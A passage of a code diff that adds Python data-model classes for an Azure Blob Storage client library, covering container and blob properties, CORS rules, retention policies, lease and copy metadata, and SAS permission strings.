retention_policy=RetentionPolicy._from_generated(generated.retention_policy) # pylint: disable=protected-access + ) + + +class RetentionPolicy(GeneratedRetentionPolicy): + """The retention policy which determines how long the associated data should + persist. + + :param bool enabled: + Indicates whether a retention policy is enabled for the storage service. + The default value is False. + :param int days: + Indicates the number of days that metrics or logging or + soft-deleted data should be retained. 
All data older than this value will
+        be deleted. If enabled=True, the number of days must be specified.
+    """
+
+    def __init__(self, enabled=False, days=None):
+        super(RetentionPolicy, self).__init__(enabled=enabled, days=days, allow_permanent_delete=None)
+        if self.enabled and (self.days is None):
+            raise ValueError("If policy is enabled, 'days' must be specified.")
+
+    @classmethod
+    def _from_generated(cls, generated):
+        if not generated:
+            return cls()
+        return cls(
+            enabled=generated.enabled,
+            days=generated.days,
+        )
+
+
+class StaticWebsite(GeneratedStaticWebsite):
+    """The properties that enable an account to host a static website.
+
+    :keyword bool enabled:
+        Indicates whether this account is hosting a static website.
+        The default value is `False`.
+    :keyword str index_document:
+        The default name of the index page under each directory.
+    :keyword str error_document404_path:
+        The absolute path of the custom 404 page.
+    :keyword str default_index_document_path:
+        Absolute path of the default index page.
+    """
+
+    def __init__(self, **kwargs):
+        self.enabled = kwargs.get('enabled', False)
+        if self.enabled:
+            self.index_document = kwargs.get('index_document')
+            self.error_document404_path = kwargs.get('error_document404_path')
+            self.default_index_document_path = kwargs.get('default_index_document_path')
+        else:
+            self.index_document = None
+            self.error_document404_path = None
+            self.default_index_document_path = None
+
+    @classmethod
+    def _from_generated(cls, generated):
+        if not generated:
+            return cls()
+        return cls(
+            enabled=generated.enabled,
+            index_document=generated.index_document,
+            error_document404_path=generated.error_document404_path,
+            default_index_document_path=generated.default_index_document_path
+        )
+
+
+class CorsRule(GeneratedCorsRule):
+    """CORS is an HTTP feature that enables a web application running under one
+    domain to access resources in another domain. Web browsers implement a
+    security restriction known as same-origin policy that prevents a web page
+    from calling APIs in a different domain; CORS provides a secure way to
+    allow one domain (the origin domain) to call APIs in another domain.
+
+    :param list(str) allowed_origins:
+        A list of origin domains that will be allowed via CORS, or "*" to allow
+        all domains. The list must contain at least one entry. Limited to 64
+        origin domains. Each allowed origin can have up to 256 characters.
+    :param list(str) allowed_methods:
+        A list of HTTP methods that are allowed to be executed by the origin.
+        The list must contain at least one entry. For Azure Storage,
+        permitted methods are DELETE, GET, HEAD, MERGE, POST, OPTIONS or PUT.
+    :keyword list(str) allowed_headers:
+        Defaults to an empty list. A list of headers allowed to be part of
+        the cross-origin request. Limited to 64 defined headers and 2 prefixed
+        headers. Each header can be up to 256 characters.
+    :keyword list(str) exposed_headers:
+        Defaults to an empty list. A list of response headers to expose to CORS
+        clients. Limited to 64 defined headers and 2 prefixed headers. Each
+        header can be up to 256 characters.
+    :keyword int max_age_in_seconds:
+        The number of seconds that the client/browser should cache a
+        preflight response.
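+
+    Example (a minimal sketch; the origin, method and header values are
+    illustrative):
+
+    .. code-block:: python
+
+        rule = CorsRule(
+            ['https://www.contoso.com'],
+            ['GET', 'PUT'],
+            allowed_headers=['x-ms-meta-*'],
+            max_age_in_seconds=500)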
+ """ + + def __init__(self, allowed_origins, allowed_methods, **kwargs): + self.allowed_origins = ','.join(allowed_origins) + self.allowed_methods = ','.join(allowed_methods) + self.allowed_headers = ','.join(kwargs.get('allowed_headers', [])) + self.exposed_headers = ','.join(kwargs.get('exposed_headers', [])) + self.max_age_in_seconds = kwargs.get('max_age_in_seconds', 0) + + @classmethod + def _from_generated(cls, generated): + return cls( + [generated.allowed_origins], + [generated.allowed_methods], + allowed_headers=[generated.allowed_headers], + exposed_headers=[generated.exposed_headers], + max_age_in_seconds=generated.max_age_in_seconds, + ) + + +class ContainerProperties(DictMixin): + """Blob container's properties class. + + Returned ``ContainerProperties`` instances expose these values through a + dictionary interface, for example: ``container_props["last_modified"]``. + Additionally, the container name is available as ``container_props["name"]``. + + :ivar str name: + Name of the container. + :ivar ~datetime.datetime last_modified: + A datetime object representing the last time the container was modified. + :ivar str etag: + The ETag contains a value that you can use to perform operations + conditionally. + :ivar ~azure.storage.blob.LeaseProperties lease: + Stores all the lease information for the container. + :ivar str public_access: Specifies whether data in the container may be accessed + publicly and the level of access. + :ivar bool has_immutability_policy: + Represents whether the container has an immutability policy. + :ivar bool has_legal_hold: + Represents whether the container has a legal hold. + :ivar bool immutable_storage_with_versioning_enabled: + Represents whether immutable storage with versioning enabled on the container. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :ivar dict metadata: A dict with name-value pairs to associate with the + container as metadata. + :ivar ~azure.storage.blob.ContainerEncryptionScope encryption_scope: + The default encryption scope configuration for the container. + :ivar bool deleted: + Whether this container was deleted. + :ivar str version: + The version of a deleted container. 
+ """ + + def __init__(self, **kwargs): + self.name = None + self.last_modified = kwargs.get('Last-Modified') + self.etag = kwargs.get('ETag') + self.lease = LeaseProperties(**kwargs) + self.public_access = kwargs.get('x-ms-blob-public-access') + self.has_immutability_policy = kwargs.get('x-ms-has-immutability-policy') + self.deleted = None + self.version = None + self.has_legal_hold = kwargs.get('x-ms-has-legal-hold') + self.metadata = kwargs.get('metadata') + self.encryption_scope = None + self.immutable_storage_with_versioning_enabled = kwargs.get('x-ms-immutable-storage-with-versioning-enabled') + default_encryption_scope = kwargs.get('x-ms-default-encryption-scope') + if default_encryption_scope: + self.encryption_scope = ContainerEncryptionScope( + default_encryption_scope=default_encryption_scope, + prevent_encryption_scope_override=kwargs.get('x-ms-deny-encryption-scope-override', False) + ) + + @classmethod + def _from_generated(cls, generated): + props = cls() + props.name = generated.name + props.last_modified = generated.properties.last_modified + props.etag = generated.properties.etag + props.lease = LeaseProperties._from_generated(generated) # pylint: disable=protected-access + props.public_access = generated.properties.public_access + props.has_immutability_policy = generated.properties.has_immutability_policy + props.immutable_storage_with_versioning_enabled = \ + generated.properties.is_immutable_storage_with_versioning_enabled + props.deleted = generated.deleted + props.version = generated.version + props.has_legal_hold = generated.properties.has_legal_hold + props.metadata = generated.metadata + props.encryption_scope = ContainerEncryptionScope._from_generated(generated) #pylint: disable=protected-access + return props + + +class ContainerPropertiesPaged(PageIterator): + """An Iterable of Container properties. + + :ivar str service_endpoint: The service URL. + :ivar str prefix: A container name prefix being used to filter the list. + :ivar str marker: The continuation token of the current page of results. + :ivar int results_per_page: The maximum number of results retrieved per API call. + :ivar str continuation_token: The continuation token to retrieve the next page of results. + :ivar str location_mode: The location mode being used to list results. The available + options include "primary" and "secondary". + :ivar current_page: The current page of listed results. + :vartype current_page: list(~azure.storage.blob.ContainerProperties) + + :param callable command: Function to retrieve the next page of items. + :param str prefix: Filters the results to return only containers whose names + begin with the specified prefix. + :param int results_per_page: The maximum number of container names to retrieve per + call. + :param str continuation_token: An opaque continuation token. 
+ """ + def __init__(self, command, prefix=None, results_per_page=None, continuation_token=None): + super(ContainerPropertiesPaged, self).__init__( + get_next=self._get_next_cb, + extract_data=self._extract_data_cb, + continuation_token=continuation_token or "" + ) + self._command = command + self.service_endpoint = None + self.prefix = prefix + self.marker = None + self.results_per_page = results_per_page + self.location_mode = None + self.current_page = [] + + def _get_next_cb(self, continuation_token): + try: + return self._command( + marker=continuation_token or None, + maxresults=self.results_per_page, + cls=return_context_and_deserialized, + use_location=self.location_mode) + except HttpResponseError as error: + process_storage_error(error) + + def _extract_data_cb(self, get_next_return): + self.location_mode, self._response = get_next_return + self.service_endpoint = self._response.service_endpoint + self.prefix = self._response.prefix + self.marker = self._response.marker + self.results_per_page = self._response.max_results + self.current_page = [self._build_item(item) for item in self._response.container_items] + + return self._response.next_marker or None, self.current_page + + @staticmethod + def _build_item(item): + return ContainerProperties._from_generated(item) # pylint: disable=protected-access + + +class ImmutabilityPolicy(DictMixin): + """Optional parameters for setting the immutability policy of a blob, blob snapshot or blob version. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword ~datetime.datetime expiry_time: + Specifies the date time when the blobs immutability policy is set to expire. + :keyword str or ~azure.storage.blob.BlobImmutabilityPolicyMode policy_mode: + Specifies the immutability policy mode to set on the blob. + Possible values to set include: "Locked", "Unlocked". + "Mutable" can only be returned by service, don't set to "Mutable". + """ + + def __init__(self, **kwargs): + self.expiry_time = kwargs.pop('expiry_time', None) + self.policy_mode = kwargs.pop('policy_mode', None) + + @classmethod + def _from_generated(cls, generated): + immutability_policy = cls() + immutability_policy.expiry_time = generated.properties.immutability_policy_expires_on + immutability_policy.policy_mode = generated.properties.immutability_policy_mode + return immutability_policy + + +class BlobProperties(DictMixin): + """ + Blob Properties. + + :ivar str name: + The name of the blob. + :ivar str container: + The container in which the blob resides. + :ivar str snapshot: + Datetime value that uniquely identifies the blob snapshot. + :ivar ~azure.blob.storage.BlobType blob_type: + String indicating this blob's type. + :ivar dict metadata: + Name-value pairs associated with the blob as metadata. + :ivar ~datetime.datetime last_modified: + A datetime object representing the last time the blob was modified. + :ivar str etag: + The ETag contains a value that you can use to perform operations + conditionally. + :ivar int size: + The size of the content returned. If the entire blob was requested, + the length of blob in bytes. If a subset of the blob was requested, the + length of the returned subset. + :ivar str content_range: + Indicates the range of bytes returned in the event that the client + requested a subset of the blob. + :ivar int append_blob_committed_block_count: + (For Append Blobs) Number of committed blocks in the blob. + :ivar bool is_append_blob_sealed: + Indicate if the append blob is sealed or not. + + .. 
versionadded:: 12.4.0 + + :ivar int page_blob_sequence_number: + (For Page Blobs) Sequence number for page blob used for coordinating + concurrent writes. + :ivar bool server_encrypted: + Set to true if the blob is encrypted on the server. + :ivar ~azure.storage.blob.CopyProperties copy: + Stores all the copy properties for the blob. + :ivar ~azure.storage.blob.ContentSettings content_settings: + Stores all the content settings for the blob. + :ivar ~azure.storage.blob.LeaseProperties lease: + Stores all the lease information for the blob. + :ivar ~azure.storage.blob.StandardBlobTier blob_tier: + Indicates the access tier of the blob. The hot tier is optimized + for storing data that is accessed frequently. The cool storage tier + is optimized for storing data that is infrequently accessed and stored + for at least a month. The archive tier is optimized for storing + data that is rarely accessed and stored for at least six months + with flexible latency requirements. + :ivar str rehydrate_priority: + Indicates the priority with which to rehydrate an archived blob + :ivar ~datetime.datetime blob_tier_change_time: + Indicates when the access tier was last changed. + :ivar bool blob_tier_inferred: + Indicates whether the access tier was inferred by the service. + If false, it indicates that the tier was set explicitly. + :ivar bool deleted: + Whether this blob was deleted. + :ivar ~datetime.datetime deleted_time: + A datetime object representing the time at which the blob was deleted. + :ivar int remaining_retention_days: + The number of days that the blob will be retained before being permanently deleted by the service. + :ivar ~datetime.datetime creation_time: + Indicates when the blob was created, in UTC. + :ivar str archive_status: + Archive status of blob. + :ivar str encryption_key_sha256: + The SHA-256 hash of the provided encryption key. + :ivar str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + :ivar bool request_server_encrypted: + Whether this blob is encrypted. + :ivar list(~azure.storage.blob.ObjectReplicationPolicy) object_replication_source_properties: + Only present for blobs that have policy ids and rule ids applied to them. + + .. versionadded:: 12.4.0 + + :ivar str object_replication_destination_policy: + Represents the Object Replication Policy Id that created this blob. + + .. versionadded:: 12.4.0 + + :ivar ~datetime.datetime last_accessed_on: + Indicates when the last Read/Write operation was performed on a Blob. + + .. versionadded:: 12.6.0 + + :ivar int tag_count: + Tags count on this blob. + + .. versionadded:: 12.4.0 + + :ivar dict(str, str) tags: + Key value pair of tags on this blob. + + .. versionadded:: 12.4.0 + :ivar bool has_versions_only: + A true value indicates the root blob is deleted + + .. versionadded:: 12.10.0 + + :ivar ~azure.storage.blob.ImmutabilityPolicy immutability_policy: + Specifies the immutability policy of a blob, blob snapshot or blob version. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :ivar bool has_legal_hold: + Specified if a legal hold should be set on the blob. + Currently this parameter of upload_blob() API is for BlockBlob only. + + .. 
versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + """ + + def __init__(self, **kwargs): + self.name = kwargs.get('name') + self.container = None + self.snapshot = kwargs.get('x-ms-snapshot') + self.version_id = kwargs.get('x-ms-version-id') + self.is_current_version = kwargs.get('x-ms-is-current-version') + self.blob_type = BlobType(kwargs['x-ms-blob-type']) if kwargs.get('x-ms-blob-type') else None + self.metadata = kwargs.get('metadata') + self.encrypted_metadata = kwargs.get('encrypted_metadata') + self.last_modified = kwargs.get('Last-Modified') + self.etag = kwargs.get('ETag') + self.size = kwargs.get('Content-Length') + self.content_range = kwargs.get('Content-Range') + self.append_blob_committed_block_count = kwargs.get('x-ms-blob-committed-block-count') + self.is_append_blob_sealed = kwargs.get('x-ms-blob-sealed') + self.page_blob_sequence_number = kwargs.get('x-ms-blob-sequence-number') + self.server_encrypted = kwargs.get('x-ms-server-encrypted') + self.copy = CopyProperties(**kwargs) + self.content_settings = ContentSettings(**kwargs) + self.lease = LeaseProperties(**kwargs) + self.blob_tier = kwargs.get('x-ms-access-tier') + self.rehydrate_priority = kwargs.get('x-ms-rehydrate-priority') + self.blob_tier_change_time = kwargs.get('x-ms-access-tier-change-time') + self.blob_tier_inferred = kwargs.get('x-ms-access-tier-inferred') + self.deleted = False + self.deleted_time = None + self.remaining_retention_days = None + self.creation_time = kwargs.get('x-ms-creation-time') + self.archive_status = kwargs.get('x-ms-archive-status') + self.encryption_key_sha256 = kwargs.get('x-ms-encryption-key-sha256') + self.encryption_scope = kwargs.get('x-ms-encryption-scope') + self.request_server_encrypted = kwargs.get('x-ms-server-encrypted') + self.object_replication_source_properties = kwargs.get('object_replication_source_properties') + self.object_replication_destination_policy = kwargs.get('x-ms-or-policy-id') + self.last_accessed_on = kwargs.get('x-ms-last-access-time') + self.tag_count = kwargs.get('x-ms-tag-count') + self.tags = None + self.immutability_policy = ImmutabilityPolicy(expiry_time=kwargs.get('x-ms-immutability-policy-until-date'), + policy_mode=kwargs.get('x-ms-immutability-policy-mode')) + self.has_legal_hold = kwargs.get('x-ms-legal-hold') + self.has_versions_only = None + + +class FilteredBlob(DictMixin): + """Blob info from a Filter Blobs API call. + + :ivar name: Blob name + :type name: str + :ivar container_name: Container name. + :type container_name: str + :ivar tags: Key value pairs of blob tags. + :type tags: Dict[str, str] + """ + def __init__(self, **kwargs): + self.name = kwargs.get('name', None) + self.container_name = kwargs.get('container_name', None) + self.tags = kwargs.get('tags', None) + + +class LeaseProperties(DictMixin): + """Blob Lease Properties. + + :ivar str status: + The lease status of the blob. Possible values: locked|unlocked + :ivar str state: + Lease state of the blob. Possible values: available|leased|expired|breaking|broken + :ivar str duration: + When a blob is leased, specifies whether the lease is of infinite or fixed duration. 
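+
+    Example (illustrative; ``blob_client`` is assumed to be an existing
+    ``BlobClient``):
+
+    .. code-block:: python
+
+        props = blob_client.get_blob_properties()
+        print(props.lease.status, props.lease.state)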
+ """ + + def __init__(self, **kwargs): + self.status = get_enum_value(kwargs.get('x-ms-lease-status')) + self.state = get_enum_value(kwargs.get('x-ms-lease-state')) + self.duration = get_enum_value(kwargs.get('x-ms-lease-duration')) + + @classmethod + def _from_generated(cls, generated): + lease = cls() + lease.status = get_enum_value(generated.properties.lease_status) + lease.state = get_enum_value(generated.properties.lease_state) + lease.duration = get_enum_value(generated.properties.lease_duration) + return lease + + +class ContentSettings(DictMixin): + """The content settings of a blob. + + :param str content_type: + The content type specified for the blob. If no content type was + specified, the default content type is application/octet-stream. + :param str content_encoding: + If the content_encoding has previously been set + for the blob, that value is stored. + :param str content_language: + If the content_language has previously been set + for the blob, that value is stored. + :param str content_disposition: + content_disposition conveys additional information about how to + process the response payload, and also can be used to attach + additional metadata. If content_disposition has previously been set + for the blob, that value is stored. + :param str cache_control: + If the cache_control has previously been set for + the blob, that value is stored. + :param bytearray content_md5: + If the content_md5 has been set for the blob, this response + header is stored so that the client can check for message content + integrity. + """ + + def __init__( + self, content_type=None, content_encoding=None, + content_language=None, content_disposition=None, + cache_control=None, content_md5=None, **kwargs): + + self.content_type = content_type or kwargs.get('Content-Type') + self.content_encoding = content_encoding or kwargs.get('Content-Encoding') + self.content_language = content_language or kwargs.get('Content-Language') + self.content_md5 = content_md5 or kwargs.get('Content-MD5') + self.content_disposition = content_disposition or kwargs.get('Content-Disposition') + self.cache_control = cache_control or kwargs.get('Cache-Control') + + @classmethod + def _from_generated(cls, generated): + settings = cls() + settings.content_type = generated.properties.content_type or None + settings.content_encoding = generated.properties.content_encoding or None + settings.content_language = generated.properties.content_language or None + settings.content_md5 = generated.properties.content_md5 or None + settings.content_disposition = generated.properties.content_disposition or None + settings.cache_control = generated.properties.cache_control or None + return settings + + +class CopyProperties(DictMixin): + """Blob Copy Properties. + + These properties will be `None` if this blob has never been the destination + in a Copy Blob operation, or if this blob has been modified after a concluded + Copy Blob operation, for example, using Set Blob Properties, Upload Blob, or Commit Block List. + + :ivar str id: + String identifier for the last attempted Copy Blob operation where this blob + was the destination blob. + :ivar str source: + URL up to 2 KB in length that specifies the source blob used in the last attempted + Copy Blob operation where this blob was the destination blob. + :ivar str status: + State of the copy operation identified by Copy ID, with these values: + success: + Copy completed successfully. + pending: + Copy is in progress. 
Check copy_status_description if intermittent, + non-fatal errors impede copy progress but don't cause failure. + aborted: + Copy was ended by Abort Copy Blob. + failed: + Copy failed. See copy_status_description for failure details. + :ivar str progress: + Contains the number of bytes copied and the total bytes in the source in the last + attempted Copy Blob operation where this blob was the destination blob. Can show + between 0 and Content-Length bytes copied. + :ivar ~datetime.datetime completion_time: + Conclusion time of the last attempted Copy Blob operation where this blob was the + destination blob. This value can specify the time of a completed, aborted, or + failed copy attempt. + :ivar str status_description: + Only appears when x-ms-copy-status is failed or pending. Describes cause of fatal + or non-fatal copy operation failure. + :ivar bool incremental_copy: + Copies the snapshot of the source page blob to a destination page blob. + The snapshot is copied such that only the differential changes between + the previously copied snapshot are transferred to the destination + :ivar ~datetime.datetime destination_snapshot: + Included if the blob is incremental copy blob or incremental copy snapshot, + if x-ms-copy-status is success. Snapshot time of the last successful + incremental copy snapshot for this blob. + """ + + def __init__(self, **kwargs): + self.id = kwargs.get('x-ms-copy-id') + self.source = kwargs.get('x-ms-copy-source') + self.status = get_enum_value(kwargs.get('x-ms-copy-status')) + self.progress = kwargs.get('x-ms-copy-progress') + self.completion_time = kwargs.get('x-ms-copy-completion_time') + self.status_description = kwargs.get('x-ms-copy-status-description') + self.incremental_copy = kwargs.get('x-ms-incremental-copy') + self.destination_snapshot = kwargs.get('x-ms-copy-destination-snapshot') + + @classmethod + def _from_generated(cls, generated): + copy = cls() + copy.id = generated.properties.copy_id or None + copy.status = get_enum_value(generated.properties.copy_status) or None + copy.source = generated.properties.copy_source or None + copy.progress = generated.properties.copy_progress or None + copy.completion_time = generated.properties.copy_completion_time or None + copy.status_description = generated.properties.copy_status_description or None + copy.incremental_copy = generated.properties.incremental_copy or None + copy.destination_snapshot = generated.properties.destination_snapshot or None + return copy + + +class BlobBlock(DictMixin): + """BlockBlob Block class. + + :param str block_id: + Block id. + :param str state: + Block state. Possible values: committed|uncommitted + :ivar int size: + Block size in bytes. + """ + + def __init__(self, block_id, state=BlockState.Latest): + self.id = block_id + self.state = state + self.size = None + + @classmethod + def _from_generated(cls, generated): + try: + decoded_bytes = decode_base64_to_bytes(generated.name) + block_id = decoded_bytes.decode('utf-8') + # this is to fix a bug. When large blocks are uploaded through upload_blob the block id isn't base64 encoded + # while service expected block id is base64 encoded, so when we get block_id if we cannot base64 decode, it + # means we didn't base64 encode it when stage the block, we want to use the returned block_id directly. + except UnicodeDecodeError: + block_id = generated.name + block = cls(block_id) + block.size = generated.size + return block + + +class PageRange(DictMixin): + """Page Range for page blob. 
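+
+    A range describes either written data (``cleared=False``) or a cleared
+    region (``cleared=True``); for example, ``PageRange(0, 511)`` covers the
+    first 512 bytes of a page blob.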
+ + :param int start: + Start of page range in bytes. + :param int end: + End of page range in bytes. + :ivar bool cleared: + Whether the range has been cleared. + """ + + def __init__(self, start=None, end=None, *, cleared=False): + self.start = start + self.end = end + self.cleared = cleared + + +class PageRangePaged(PageIterator): + def __init__(self, command, results_per_page=None, continuation_token=None): + super(PageRangePaged, self).__init__( + get_next=self._get_next_cb, + extract_data=self._extract_data_cb, + continuation_token=continuation_token or "" + ) + self._command = command + self.results_per_page = results_per_page + self.location_mode = None + self.current_page = [] + + def _get_next_cb(self, continuation_token): + try: + return self._command( + marker=continuation_token or None, + maxresults=self.results_per_page, + cls=return_context_and_deserialized, + use_location=self.location_mode) + except HttpResponseError as error: + process_storage_error(error) + + def _extract_data_cb(self, get_next_return): + self.location_mode, self._response = get_next_return + self.current_page = self._build_page(self._response) + + return self._response.next_marker or None, self.current_page + + @staticmethod + def _build_page(response): + if not response: + raise StopIteration + + return parse_page_list(response) + + +class AccessPolicy(GenAccessPolicy): + """Access Policy class used by the set and get access policy methods in each service. + + A stored access policy can specify the start time, expiry time, and + permissions for the Shared Access Signatures with which it's associated. + Depending on how you want to control access to your resource, you can + specify all of these parameters within the stored access policy, and omit + them from the URL for the Shared Access Signature. Doing so permits you to + modify the associated signature's behavior at any time, as well as to revoke + it. Or you can specify one or more of the access policy parameters within + the stored access policy, and the others on the URL. Finally, you can + specify all of the parameters on the URL. In this case, you can use the + stored access policy to revoke the signature, but not to modify its behavior. + + Together the Shared Access Signature and the stored access policy must + include all fields required to authenticate the signature. If any required + fields are missing, the request will fail. Likewise, if a field is specified + both in the Shared Access Signature URL and in the stored access policy, the + request will fail with status code 400 (Bad Request). + + :param permission: + The permissions associated with the shared access signature. The + user is restricted to operations allowed by the permissions. + Required unless an id is given referencing a stored access policy + which contains this field. This field must be omitted if it has been + specified in an associated stored access policy. + :type permission: str or ~azure.storage.blob.ContainerSasPermissions + :param expiry: + The time at which the shared access signature becomes invalid. + Required unless an id is given referencing a stored access policy + which contains this field. This field must be omitted if it has + been specified in an associated stored access policy. Azure will always + convert values to UTC. If a date is passed in without timezone info, it + is assumed to be UTC. + :type expiry: ~datetime.datetime or str + :param start: + The time at which the shared access signature becomes valid. 
If + omitted, start time for this call is assumed to be the time when the + storage service receives the request. Azure will always convert values + to UTC. If a date is passed in without timezone info, it is assumed to + be UTC. + :type start: ~datetime.datetime or str + """ + def __init__(self, permission=None, expiry=None, start=None): + self.start = start + self.expiry = expiry + self.permission = permission + + +class ContainerSasPermissions(object): + """ContainerSasPermissions class to be used with the + :func:`~azure.storage.blob.generate_container_sas` function and + for the AccessPolicies used with + :func:`~azure.storage.blob.ContainerClient.set_container_access_policy`. + + :param bool read: + Read the content, properties, metadata or block list of any blob in the + container. Use any blob in the container as the source of a copy operation. + :param bool write: + For any blob in the container, create or write content, properties, + metadata, or block list. Snapshot or lease the blob. Resize the blob + (page blob only). Use the blob as the destination of a copy operation + within the same account. Note: You cannot grant permissions to read or + write container properties or metadata, nor to lease a container, with + a container SAS. Use an account SAS instead. + :param bool delete: + Delete any blob in the container. Note: You cannot grant permissions to + delete a container with a container SAS. Use an account SAS instead. + :param bool delete_previous_version: + Delete the previous blob version for the versioning enabled storage account. + :param bool list: + List blobs in the container. + :param bool tag: + Set or get tags on the blobs in the container. + :keyword bool add: + Add a block to an append blob. + :keyword bool create: + Write a new blob, snapshot a blob, or copy a blob to a new blob. + :keyword bool permanent_delete: + To enable permanent delete on the blob is permitted. + :keyword bool filter_by_tags: + To enable finding blobs by tags. + :keyword bool move: + Move a blob or a directory and its contents to a new location. + :keyword bool execute: + Get the system properties and, if the hierarchical namespace is enabled for the storage account, + get the POSIX ACL of a blob. + :keyword bool set_immutability_policy: + To enable operations related to set/delete immutability policy. + To get immutability policy, you just need read permission. 
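+
+    Example (a minimal sketch; the permission string is derived from the
+    flags exactly as ``__str__`` below builds it):
+
+    .. code-block:: python
+
+        permissions = ContainerSasPermissions(read=True, list=True)
+        assert str(permissions) == 'rl'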
+ """ + def __init__(self, read=False, write=False, delete=False, + list=False, delete_previous_version=False, tag=False, **kwargs): # pylint: disable=redefined-builtin + self.read = read + self.add = kwargs.pop('add', False) + self.create = kwargs.pop('create', False) + self.write = write + self.delete = delete + self.delete_previous_version = delete_previous_version + self.permanent_delete = kwargs.pop('permanent_delete', False) + self.list = list + self.tag = tag + self.filter_by_tags = kwargs.pop('filter_by_tags', False) + self.move = kwargs.pop('move', False) + self.execute = kwargs.pop('execute', False) + self.set_immutability_policy = kwargs.pop('set_immutability_policy', False) + self._str = (('r' if self.read else '') + + ('a' if self.add else '') + + ('c' if self.create else '') + + ('w' if self.write else '') + + ('d' if self.delete else '') + + ('x' if self.delete_previous_version else '') + + ('y' if self.permanent_delete else '') + + ('l' if self.list else '') + + ('t' if self.tag else '') + + ('f' if self.filter_by_tags else '') + + ('m' if self.move else '') + + ('e' if self.execute else '') + + ('i' if self.set_immutability_policy else '')) + + def __str__(self): + return self._str + + @classmethod + def from_string(cls, permission): + """Create a ContainerSasPermissions from a string. + + To specify read, write, delete, or list permissions you need only to + include the first letter of the word in the string. E.g. For read and + write permissions, you would provide a string "rw". + + :param str permission: The string which dictates the read, write, delete, + and list permissions. + :return: A ContainerSasPermissions object + :rtype: ~azure.storage.blob.ContainerSasPermissions + """ + p_read = 'r' in permission + p_add = 'a' in permission + p_create = 'c' in permission + p_write = 'w' in permission + p_delete = 'd' in permission + p_delete_previous_version = 'x' in permission + p_permanent_delete = 'y' in permission + p_list = 'l' in permission + p_tag = 't' in permission + p_filter_by_tags = 'f' in permission + p_move = 'm' in permission + p_execute = 'e' in permission + p_set_immutability_policy = 'i' in permission + parsed = cls(read=p_read, write=p_write, delete=p_delete, list=p_list, + delete_previous_version=p_delete_previous_version, tag=p_tag, add=p_add, + create=p_create, permanent_delete=p_permanent_delete, filter_by_tags=p_filter_by_tags, + move=p_move, execute=p_execute, set_immutability_policy=p_set_immutability_policy) + + return parsed + + +class BlobSasPermissions(object): + """BlobSasPermissions class to be used with the + :func:`~azure.storage.blob.generate_blob_sas` function. + + :param bool read: + Read the content, properties, metadata and block list. Use the blob as + the source of a copy operation. + :param bool add: + Add a block to an append blob. + :param bool create: + Write a new blob, snapshot a blob, or copy a blob to a new blob. + :param bool write: + Create or write content, properties, metadata, or block list. Snapshot + or lease the blob. Resize the blob (page blob only). Use the blob as the + destination of a copy operation within the same account. + :param bool delete: + Delete the blob. + :param bool delete_previous_version: + Delete the previous blob version for the versioning enabled storage account. + :param bool tag: + Set or get tags on the blob. + :keyword bool permanent_delete: + To enable permanent delete on the blob is permitted. + :keyword bool move: + Move a blob or a directory and its contents to a new location. 
+ :keyword bool execute: + Get the system properties and, if the hierarchical namespace is enabled for the storage account, + get the POSIX ACL of a blob. + :keyword bool set_immutability_policy: + To enable operations related to set/delete immutability policy. + To get immutability policy, you just need read permission. + """ + def __init__(self, read=False, add=False, create=False, write=False, + delete=False, delete_previous_version=False, tag=False, **kwargs): + self.read = read + self.add = add + self.create = create + self.write = write + self.delete = delete + self.delete_previous_version = delete_previous_version + self.permanent_delete = kwargs.pop('permanent_delete', False) + self.tag = tag + self.move = kwargs.pop('move', False) + self.execute = kwargs.pop('execute', False) + self.set_immutability_policy = kwargs.pop('set_immutability_policy', False) + self._str = (('r' if self.read else '') + + ('a' if self.add else '') + + ('c' if self.create else '') + + ('w' if self.write else '') + + ('d' if self.delete else '') + + ('x' if self.delete_previous_version else '') + + ('y' if self.permanent_delete else '') + + ('t' if self.tag else '') + + ('m' if self.move else '') + + ('e' if self.execute else '') + + ('i' if self.set_immutability_policy else '')) + + def __str__(self): + return self._str + + @classmethod + def from_string(cls, permission): + """Create a BlobSasPermissions from a string. + + To specify read, add, create, write, or delete permissions you need only to + include the first letter of the word in the string. E.g. For read and + write permissions, you would provide a string "rw". + + :param str permission: The string which dictates the read, add, create, + write, or delete permissions. + :return: A BlobSasPermissions object + :rtype: ~azure.storage.blob.BlobSasPermissions + """ + p_read = 'r' in permission + p_add = 'a' in permission + p_create = 'c' in permission + p_write = 'w' in permission + p_delete = 'd' in permission + p_delete_previous_version = 'x' in permission + p_permanent_delete = 'y' in permission + p_tag = 't' in permission + p_move = 'm' in permission + p_execute = 'e' in permission + p_set_immutability_policy = 'i' in permission + + parsed = cls(read=p_read, add=p_add, create=p_create, write=p_write, delete=p_delete, + delete_previous_version=p_delete_previous_version, tag=p_tag, permanent_delete=p_permanent_delete, + move=p_move, execute=p_execute, set_immutability_policy=p_set_immutability_policy) + + return parsed + + +class CustomerProvidedEncryptionKey(object): + """ + All data in Azure Storage is encrypted at-rest using an account-level encryption key. + In versions 2018-06-17 and newer, you can manage the key used to encrypt blob contents + and application metadata per-blob by providing an AES-256 encryption key in requests to the storage service. + + When you use a customer-provided key, Azure Storage does not manage or persist your key. + When writing data to a blob, the provided key is used to encrypt your data before writing it to disk. + A SHA-256 hash of the encryption key is written alongside the blob contents, + and is used to verify that all subsequent operations against the blob use the same encryption key. + This hash cannot be used to retrieve the encryption key or decrypt the contents of the blob. + When reading a blob, the provided key is used to decrypt your data after reading it from disk. + In both cases, the provided encryption key is securely discarded + as soon as the encryption or decryption process completes. 
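+
+    Example of building a key (an illustrative sketch using only the standard
+    library; ``raw_key`` and ``cpk`` are hypothetical names):
+
+    .. code-block:: python
+
+        import base64, hashlib, os
+
+        raw_key = os.urandom(32)  # AES-256 uses a 32-byte key
+        cpk = CustomerProvidedEncryptionKey(
+            key_value=base64.b64encode(raw_key).decode(),
+            key_hash=base64.b64encode(hashlib.sha256(raw_key).digest()).decode())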
